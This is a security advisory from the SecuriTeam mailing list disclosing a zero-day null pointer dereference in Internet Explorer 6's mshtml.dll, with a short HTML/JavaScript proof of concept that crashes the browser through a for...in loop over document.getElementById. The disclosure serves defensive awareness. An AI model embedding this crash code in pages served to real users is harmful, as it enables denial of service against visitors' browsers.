The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
MS Internet Explorer 6 Null Pointer Dereference Exploit (mshtml.dll)
------------------------------------------------------------------------
SUMMARY
Microsoft Internet Explorer version 6 crashes when you open the attached
HTML page because it attempts to dereference a NULL pointer.
DETAILS
Vulnerable Systems:
* Microsoft Internet Explorer version 6.0.2800.1106; SP1 (Windows 2000
Advanced Server)
* Microsoft Internet Explorer version 6.0.2900.2180.xpsp.050928-1517;SP2
(Windows XP Pro)
Exploit:
<!--
+ Title: Microsoft Internet Explorer Malformed HTML Null Pointer Dereference Vulnerability (mshtml.dll) (0-day)
+ Bug discovered & exploit coded by AmesianX in powerhacker.net (YoungHo Park - amesianx@gmail.com)
+ Critical: Critical
+ Impact: MS Internet Explorer 6 -> Crash (Denial of Service)
+ Where: From remote
+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
                           Windows 2000 Advanced Server (Korean Language)
+ Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server)
                   Microsoft Internet Explorer Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)
+ Solution: Not Patched (zero-day)
+ Description:
  The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched
  Windows XP SP2 system. This bug will crash when executing a 'for' script.
+ The following proof-of-concept is also available:
  http://www.powerhacker.net/exploit/IE_NULL_CRASH.html
-->
Code:
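<html>
<head>
<title> AmesianX, RC_No1 in powerhacker.net (amesianx@gmail.com, RC_No1@gmail.com)</title>
</head>
<body>
<script language='javascript'>
// Take a reference to the document.getElementById method object.
var data = document['getElementById'];
// Enumerating its properties with for...in is the 'for' script that crashes IE 6.
for(var key in data);
</script>
</body>
</html>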
ADDITIONAL INFORMATION
The original article can be found at:
hxxp://www.milw0rm.com/exploits/3272